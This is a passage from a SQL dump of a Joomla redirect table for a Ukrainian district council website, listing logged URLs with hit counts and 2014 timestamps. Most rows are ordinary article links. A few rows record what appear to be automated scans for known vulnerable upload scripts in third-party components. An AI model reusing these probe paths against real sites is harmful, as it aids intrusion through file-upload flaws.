00:00:00',301),(5334,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1320:-15-2010-12-l-r&catid=59:--20062014-&Itemid=107&lang=uk','','','',4,0,'2014-09-28 07:47:37','0000-00-00 00:00:00',301),(5335,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1364:-2012-2015-&catid=60:--11072014-&Itemid=108&lang=en','','','',4,0,'2014-09-28 07:53:42','0000-00-00 00:00:00',301),(5336,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1364:-2012-2015-&catid=60:--11072014-&Itemid=108&lang=en','','','',4,0,'2014-09-28 07:55:57','0000-00-00 00:00:00',301),(5337,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=914:2013-01-23-13-21-28&catid=47:-21022013-&Itemid=86&lang=uk','','','',5,0,'2014-09-28 07:57:13','0000-00-00 00:00:00',301),(5338,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=959:2013-03-11-06-19-41&catid=49&Itemid=88&lang=ru','','','',1,0,'2014-09-28 08:00:55','0000-00-00 00:00:00',301),(5339,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1135:2013-11-15-07-00-15&catid=54:--29112013-&Itemid=95&lang=uk','','','',1,0,'2014-09-28 08:06:19','0000-00-00 00:00:00',301),(5340,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1007:-4-&catid=11&Itemid=14&lang=en','','','',5,0,'2014-09-28 08:16:54','0000-00-00 00:00:00',301),(5341,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1066:-23-&catid=11&Itemid=14&lang=ru','','','',5,0,'2014-09-28 08:17:12','0000-00-00 00:00:00',301),(5342,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1066:-23-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-28 08:17:20','0000-00-00 00:00:00',301),(5343,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1090:-l-r-&catid=53:--25102013-&Itemid=94&lang=uk','','','',2,0,'2014-09-28 08:17:30','0000-00-00 00:00:00',301),(5344,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1114:-lr-&catid=53:--25102013-&Itemid=94&lang=ru','','','',5,0,'2014-09-28 08:17:38','0000-00-00 00:00:00',301),(5345,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:-24-6-&catid=11&Itemid=14&lang=en','','','',5,0,'2014-09-28 08:17:54','0000-00-00 00:00:00',301),(5346,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1124:2013-10-30-08-05-10&catid=11&Itemid=14&lang=ru','','','',6,0,'2014-09-28 08:18:12','0000-00-00 00:00:00',301),(5347,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1125:2013-10-31-07-20-16&catid=11&Itemid=14&lang=en','','','',12,0,'2014-09-28 08:18:18','0000-00-00 00:00:00',301),(5348,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1126:2013-10-31-12-52-35&catid=11&Itemid=14&lang=ru','','','',5,0,'2014-09-28 08:18:28','0000-00-00 00:00:00',301),(5349,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1126:2013-10-31-12-52-35&catid=11&Itemid=14&lang=uk','','','',8,0,'2014-09-28 08:18:31','0000-00-00 00:00:00',301),(5350,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1126:2013-10-31-12-52-35&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',6,0,'2014-09-28 08:18:36','0000-00-00 00:00:00',301),(5351,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1129:2013-11-06-13-36-25&catid=11&Itemid=14&lang=en','','','',4,0,'2014-09-28 08:18:50','0000-00-00 00:00:00',301),(5352,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1181:2014-01-22-06-06-13&catid=11&Itemid=14&lang=ru','','','',4,0,'2014-09-28 08:19:32','0000-00-00 00:00:00',301),(5353,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1182:2014-01-23-06-45-09&catid=11&Itemid=14&lang=ru','','','',3,0,'2014-09-28 08:19:39','0000-00-00 00:00:00',301),(5354,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1182:2014-01-23-06-45-09&catid=11&Itemid=14&lang=uk','','','',4,0,'2014-09-28 08:19:42','0000-00-00 00:00:00',301),(5355,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1190:------------2014--&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',13,0,'2014-09-28 08:20:04','0000-00-00 00:00:00',301),(5356,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1191:------2014-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',6,0,'2014-09-28 08:20:11','0000-00-00 00:00:00',301),(5357,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1192:-2014-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',11,0,'2014-09-28 08:20:19','0000-00-00 00:00:00',301),(5358,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1192:-2014-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',8,0,'2014-09-28 08:20:22','0000-00-00 00:00:00',301),(5359,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1193:-2014-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',8,0,'2014-09-28 08:20:27','0000-00-00 00:00:00',301),(5360,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1195:2014-01-28-13-01-27&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',11,0,'2014-09-28 08:20:41','0000-00-00 00:00:00',301),(5361,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1196:2014-01-30-14-12-50&catid=11&Itemid=14&lang=uk','','','',10,0,'2014-09-28 08:20:54','0000-00-00 00:00:00',301),(5362,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1358:2014-07-07-08-11-22&catid=11&Itemid=14&lang=en','','','',7,0,'2014-09-28 08:20:57','0000-00-00 00:00:00',301),(5363,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1358:2014-07-07-08-11-22&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-09-28 08:21:02','0000-00-00 00:00:00',301),(5364,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1358:2014-07-07-08-11-22&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',8,0,'2014-09-28 08:21:05','0000-00-00 00:00:00',301),(5365,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1359:2014-07-07-08-13-48&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',6,0,'2014-09-28 08:21:10','0000-00-00 00:00:00',301),(5366,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1185:2014-01-28-09-38-54&catid=56&Itemid=97&lang=uk','','','',2,0,'2014-09-28 08:22:02','0000-00-00 00:00:00',301),(5367,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=888:-2012-&catid=46&Itemid=85&lang=en','','','',1,0,'2014-09-28 08:24:08','0000-00-00 00:00:00',301),(5368,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=888:-2012-&catid=46&Itemid=85&lang=uk','','','',4,0,'2014-09-28 08:24:14','0000-00-00 00:00:00',301),(5369,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=890:2013-01-06-09-42-40&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2014-09-28 08:24:23','0000-00-00 00:00:00',301),(5370,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=914:2013-01-23-13-21-28&catid=47&Itemid=86&lang=ru','','','',5,0,'2014-09-28 08:24:30','0000-00-00 00:00:00',301),(5371,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=918:-2013-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',9,0,'2014-09-28 08:24:36','0000-00-00 00:00:00',301),(5372,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=942:-19-6-&catid=11&Itemid=14&lang=uk','','','',3,0,'2014-09-28 08:24:59','0000-00-00 00:00:00',301),(5373,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=945:2013-03-04-07-28-58&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',3,0,'2014-09-28 08:25:02','0000-00-00 00:00:00',301),(5374,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=945:2013-03-04-07-28-58&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',2,0,'2014-09-28 08:25:05','0000-00-00 00:00:00',301),(5375,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=947:-lr-2012-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',2,0,'2014-09-28 08:25:10','0000-00-00 00:00:00',301),(5376,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=947:-lr-2012-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',3,0,'2014-09-28 08:25:13','0000-00-00 00:00:00',301),(5377,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=947:-lr-2012-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',4,0,'2014-09-28 08:25:16','0000-00-00 00:00:00',301),(5378,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=955:2013-03-07-06-31-04&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',5,0,'2014-09-28 08:25:19','0000-00-00 00:00:00',301),(5379,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=955:2013-03-07-06-31-04&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',1,0,'2014-09-28 08:25:22','0000-00-00 00:00:00',301),(5380,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=969:-2013-&catid=46&Itemid=85&lang=uk','','','',7,0,'2014-09-28 08:25:30','0000-00-00 00:00:00',301),(5381,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=959:2013-03-11-06-19-41&catid=49:--12042013-&Itemid=88&lang=uk','','','',10,0,'2014-09-28 08:25:34','0000-00-00 00:00:00',301),(5382,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1188:2014-01-28-09-45-21&catid=56:--03022014-&Itemid=97&lang=ru','','','',6,0,'2014-09-28 08:28:51','0000-00-00 00:00:00',301),(5383,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1185:2014-01-28-09-38-54&catid=56:--03022014-&Itemid=97&lang=uk','','','',4,0,'2014-09-28 08:29:10','0000-00-00 00:00:00',301),(5384,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=914:2013-01-23-13-21-28&catid=47:-21022013-&Itemid=86&lang=ru','','','',6,0,'2014-09-28 08:32:34','0000-00-00 00:00:00',301),(5385,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1185:2014-01-28-09-38-54&catid=56:--03022014-&Itemid=97&lang=ru','','','',3,0,'2014-09-28 08:35:46','0000-00-00 00:00:00',301),(5386,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1135:2013-11-15-07-00-15&catid=54&Itemid=95&lang=ru','','','',2,0,'2014-09-28 08:42:35','0000-00-00 00:00:00',301),(5387,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1092:2013-09-19-12-18-37&catid=53&Itemid=94&lang=uk','','','',5,0,'2014-09-28 08:59:30','0000-00-00 00:00:00',301),(5388,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=959:2013-03-11-06-19-41&catid=49:--12042013-&Itemid=88&lang=ru','','','',4,0,'2014-09-28 09:00:56','0000-00-00 00:00:00',301),(5389,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1185:2014-01-28-09-38-54&catid=56&Itemid=97&lang=ru','','','',2,0,'2014-09-28 09:13:03','0000-00-00 00:00:00',301),(5390,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1185:2014-01-28-09-38-54&catid=56:--03022014-&Itemid=97&lang=uk','','','',3,0,'2014-09-28 09:28:12','0000-00-00 00:00:00',301),(5391,'http://www.malyn-rayrada.org.ua/15000/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=a','','','',1,0,'2014-09-28 09:34:45','0000-00-00 00:00:00',301),(5392,'http://www.malyn-rayrada.org.ua/15000/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=a','','','',1,0,'2014-09-28 09:34:46','0000-00-00 00:00:00',301),(5393,'http://www.malyn-rayrada.org.ua/15000/components/com_community/index.html','','','',1,0,'2014-09-28 09:34:47','0000-00-00 00:00:00',301),(5394,'http://www.malyn-rayrada.org.ua/15000/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-09-28 09:34:49','0000-00-00 00:00:00',301),(5395,'http://www.malyn-rayrada.org.ua/15000/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-09-28 09:34:51','0000-00-00 00:00:00',301),(5396,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1103:2013-10-03-09-29-30&catid=11&lang=en','','https://www.google.com.ua/','',4,0,'2014-09-28 09:44:20','0000-00-00 00:00:00',301),(5397,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1109:2013-10-18-10-25-30&catid=11&Itemid=14&lang=en','','','',6,0,'2014-09-28 09:49:40','0000-00-00 00:00:00',301),(5398,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1092:2013-09-19-12-18-37&catid=53:--25102013-&Itemid=94&lang=uk','','','',24,0,'2014-09-28 09:50:53','0000-00-00 00:00:00',301),(5399,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1137:2013-11-15-13-07-04&catid=11&Itemid=14&lang=uk','','','',8,0,'2014-09-28 09:52:07','0000-00-00 00:00:00',301),(5400,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1289:2014-04-23-06-53-01&catid=10&Itemid=17&lang=uk','','','',11,0,'2014-09-28 09:53:23','0000-00-00 00:00:00',301),(5401,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=914:2013-01-23-13-21-28&catid=47:-21022013-&Itemid=86&lang=uk','','','',2,0,'2014-09-28 10:03:25','0000-00-00 00:00:00',301),(5402,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1322:-2012-2015-&catid=59&Itemid=107&lang=uk','','','',8,0,'2014-09-28 10:04:28','0000-00-00 00:00:00',301),(5403,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=914:2013-01-23-13-21-28&catid=47:-21022013-&Itemid=86&lang=ru','','','',2,0,'2014-09-28 10:10:45','0000-00-00 00:00:00',301),(5404,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1322:-2012-2015-&catid=59&Itemid=107&lang=ru','','','',5,0,'2014-09-28 10:10:58','0000-00-00 00:00:00',301),(5405,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1266:2014-04-03-05-25-14&catid=11&Itemid=14&lang=uk','','','',15,0,'2014-09-28 10:32:58','0000-00-00 00:00:00',301),(5406,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1126:2013-10-31-12-52-35&catid=11&lang=uk','','','',3,0,'2014-09-28 10:35:04','0000-00-00 00:00:00',301),(5407,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1092:2013-09-19-12-18-37&catid=53&Itemid=94&lang=uk','','','',2,0,'2014-09-28 10:38:38','0000-00-00 00:00:00',301),(5408,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1092:2013-09-19-12-18-37&catid=53&Itemid=94&lang=ru','','','',3,0,'2014-09-28 10:45:55','0000-00-00 00:00:00',301),(5409,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1280:-2014-&catid=57&Itemid=98&lang=uk','','','',3,0,'2014-09-28 10:46:16','0000-00-00 00:00:00',301),(5410,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1126:2013-10-31-12-52-35&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-28 10:48:57','0000-00-00 00:00:00',301),(5411,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1126:2013-10-31-12-52-35&catid=11&lang=uk&Itemid=','','','',3,0,'2014-09-28 11:01:36','0000-00-00 00:00:00',301),(5412,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1066:-23-&catid=11&lang=en','','','',3,0,'2014-09-28 11:05:53','0000-00-00 00:00:00',301),(5413,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1092:2013-09-19-12-18-37&catid=53:--25102013-&Itemid=94&lang=ru','','','',7,0,'2014-09-28 11:24:47','0000-00-00 00:00:00',301),(5414,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1272:2014-04-09-05-15-36&catid=10&Itemid=17&lang=uk','','','',6,0,'2014-09-28 11:35:44','0000-00-00 00:00:00',301),(5415,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1272:2014-04-09-05-15-36&catid=10&Itemid=17&lang=ru','','','',1,0,'2014-09-28 11:51:01','0000-00-00 00:00:00',301),(5416,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1272:2014-04-09-05-15-36&catid=10&Itemid=17&lang=ru','','','',5,0,'2014-09-28 11:51:52','0000-00-00 00:00:00',301),(5417,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1092:2013-09-19-12-18-37&catid=53:--25102013-&Itemid=94&lang=ru','','','',2,0,'2014-09-28 11:53:20','0000-00-00 00:00:00',301),(5418,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1219:-2004-&lang=uk&option=com_content&view=article','','','',3,0,'2014-09-28 11:54:44','0000-00-00 00:00:00',301),(5419,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1272:2014-04-09-05-15-36&catid=10:2010-06-05-13-46-44&Itemid=17&lang=ru','','','',1,0,'2014-09-28 11:56:50','0000-00-00 00:00:00',301),(5420,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1092:2013-09-19-12-18-37&catid=53:--25102013-&Itemid=94&lang=uk','','','',2,0,'2014-09-28 12:09:15','0000-00-00 00:00:00',301),(5421,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1092:2013-09-19-12-18-37&catid=53&Itemid=94&lang=ru','','','',1,0,'2014-09-28 12:10:52','0000-00-00 00:00:00',301),(5422,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1272:2014-04-09-05-15-36&catid=10:2010-06-05-13-46-44&Itemid=17&lang=uk','','','',1,0,'2014-09-28 12:12:37','0000-00-00 00:00:00',301),(5423,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1062:2013-07-29-13-33-29&catid=11&lang=ru&Itemid=','','','',10,0,'2014-09-28 12:15:06','0000-00-00 00:00:00',301),(5424,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1170:2014-01-08-11-02-06&catid=11&Itemid=14&lang=ru','','','',5,0,'2014-09-28 12:22:03','0000-00-00 00:00:00',301),(5425,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1348:2014-06-20-13-13-51&catid=59&Itemid=107&lang=en','','','',2,0,'2014-09-28 12:27:27','0000-00-00 00:00:00',301),(5426,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1323:2014-05-27-13-21-50&catid=59&Itemid=107&lang=ru','','','',3,0,'2014-09-28 12:29:03','0000-00-00 00:00:00',301),(5427,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1062:2013-07-29-13-33-29&catid=11&lang=ru','','','',2,0,'2014-09-28 12:45:29','0000-00-00 00:00:00',301),(5428,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1062:2013-07-29-13-33-29&catid=11&lang=ru&Itemid=','','','',1,0,'2014-09-28 12:52:15','0000-00-00 00:00:00',301),(5429,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1062:2013-07-29-13-33-29&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-28 12:56:44','0000-00-00 00:00:00',301),(5430,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1323:2014-05-27-13-21-50&catid=59&Itemid=107&lang=uk','','','',6,0,'2014-09-28 13:05:56','0000-00-00 00:00:00',301),(5431,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1359:2014-07-07-08-13-48&catid=11&Itemid=14&lang=en','','','',9,0,'2014-09-28 13:12:24','0000-00-00 00:00:00',301),(5432,'http://www.malyn-rayrada.org.ua/index.php?option=com_user&view=register','','http://www.malyn-rayrada.org.ua/','',81,0,'2014-09-28 13:33:14','0000-00-00 00:00:00',301),(5433,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1135:2013-11-15-07-00-15&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',4,0,'2014-09-28 13:41:33','0000-00-00 00:00:00',301),(5434,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=975:-2012-2015-&catid=49:--12042013-&Itemid=88&lang=uk','','','',5,0,'2014-09-28 13:51:27','0000-00-00 00:00:00',301),(5435,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1064:2013-08-09-07-52-21&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2014-09-28 14:13:09','0000-00-00 00:00:00',301),(5436,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1068:-22-&catid=15:2010-06-06-09-34-01&Itemid=18&lang=ru','','','',8,0,'2014-09-28 14:13:39','0000-00-00 00:00:00',301),(5437,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1079:-l-2011-2013-r&catid=53:--25102013-&Itemid=94&lang=ru','','','',3,0,'2014-09-28 14:14:03','0000-00-00 00:00:00',301),(5438,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1083:-2014-&catid=53:--25102013-&Itemid=94&lang=ru','','','',5,0,'2014-09-28 14:14:21','0000-00-00 00:00:00',301),(5439,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1087:-12-2013-398-l-2013-r-19-2013-416-l-2013-r&catid=53:--25102013-&Itemid=94&lang=ru','','','',1,0,'2014-09-28 14:14:38','0000-00-00 00:00:00',301),(5440,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1092:2013-09-19-12-18-37&catid=53:--25102013-&Itemid=94&lang=en','','','',15,0,'2014-09-28 14:15:05','0000-00-00 00:00:00',301),(5441,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1112:2013-10-23-09-24-43&catid=53:--25102013-&Itemid=94&lang=en','','','',1,0,'2014-09-28 14:15:27','0000-00-00 00:00:00',301),(5442,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1130:2013-11-07-14-04-12&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',9,0,'2014-09-28 14:17:40','0000-00-00 00:00:00',301),(5443,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1131:9-------&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-09-28 14:17:59','0000-00-00 00:00:00',301),(5444,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1200:2014-01-31-07-40-52&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',5,0,'2014-09-28 14:19:17','0000-00-00 00:00:00',301),(5445,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1219:-2004-&catid=11&lang=en','','','',4,0,'2014-09-28 14:28:37','0000-00-00 00:00:00',301),(5446,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1075:2013-09-06-09-25-33&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-09-28 14:29:57','0000-00-00 00:00:00',301),(5447,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=928:2013-02-21-09-10-17&catid=47&Itemid=86&lang=ru','','','',5,0,'2014-09-28 14:30:32','0000-00-00 00:00:00',301),(5448,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1359:2014-07-07-08-13-48&catid=11&Itemid=14&lang=uk','','','',3,0,'2014-09-28 14:31:26','0000-00-00 00:00:00',301),(5449,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1359:2014-07-07-08-13-48&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-09-28 14:31:29','0000-00-00 00:00:00',301),(5450,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1359:2014-07-07-08-13-48&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-09-28 14:31:33','0000-00-00 00:00:00',301),(5451,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1359:2014-07-07-08-13-48&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-09-28 14:31:36','0000-00-00 00:00:00',301),(5452,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1111:2013-10-22-16-06-36&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-09-28 14:33:28','0000-00-00 00:00:00',301),(5453,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1015:-200-&catid=11&lang=ru','','','',2,0,'2014-09-28 14:44:05','0000-00-00 00:00:00',301),(5454,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1124:2013-10-30-08-05-10&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-09-28 14:44:27','0000-00-00 00:00:00',301),(5455,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1125:2013-10-31-07-20-16&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-09-28 14:44:29','0000-00-00 00:00:00',301),(5456,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1172:2014-01-14-14-46-07&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-28 14:44:32','0000-00-00 00:00:00',301),(5457,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1176:-27-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',10,0,'2014-09-28 14:44:44','0000-00-00 00:00:00',301),(5458,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1219:-2004-&catid=11&lang=en&Itemid=','','','',2,0,'2014-09-28 15:24:55','0000-00-00 00:00:00',301),(5459,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1332:2014-06-04-09-44-02&catid=11&Itemid=14&lang=en','','','',2,0,'2014-09-28 15:28:13','0000-00-00 00:00:00',301),(5460,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1332:2014-06-04-09-44-02&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-09-28 15:31:54','0000-00-00 00:00:00',301),(5461,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1323:2014-05-27-13-21-50&catid=59:--20062014-&Itemid=107&lang=ru','','','',4,0,'2014-09-28 15:31:58','0000-00-00 00:00:00',301),(5462,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=912:2013-01-22-14-14-06&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',6,0,'2014-09-28 15:32:03','0000-00-00 00:00:00',301),(5463,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1219:-2004-&catid=11&lang=en','','','',5,0,'2014-09-28 15:43:50','0000-00-00 00:00:00',301),(5464,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1111:2013-10-22-16-06-36&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-28 15:49:50','0000-00-00 00:00:00',301),(5465,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1323:2014-05-27-13-21-50&catid=59:--20062014-&Itemid=107&lang=uk','','','',4,0,'2014-09-28 16:00:53','0000-00-00 00:00:00',301),(5466,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1219:-2004-&catid=11&lang=en&Itemid=','','','',5,0,'2014-09-28 16:10:33','0000-00-00 00:00:00',301),(5467,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=912:2013-01-22-14-14-06&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-09-28 16:16:39','0000-00-00 00:00:00',301),(5468,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1214:2014-02-18-09-51-45&catid=11&lang=en','','','',2,0,'2014-09-28 16:25:15','0000-00-00 00:00:00',301),(5469,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1022:-lr-&catid=36&Itemid=70&lang=en','','','',1,0,'2014-09-28 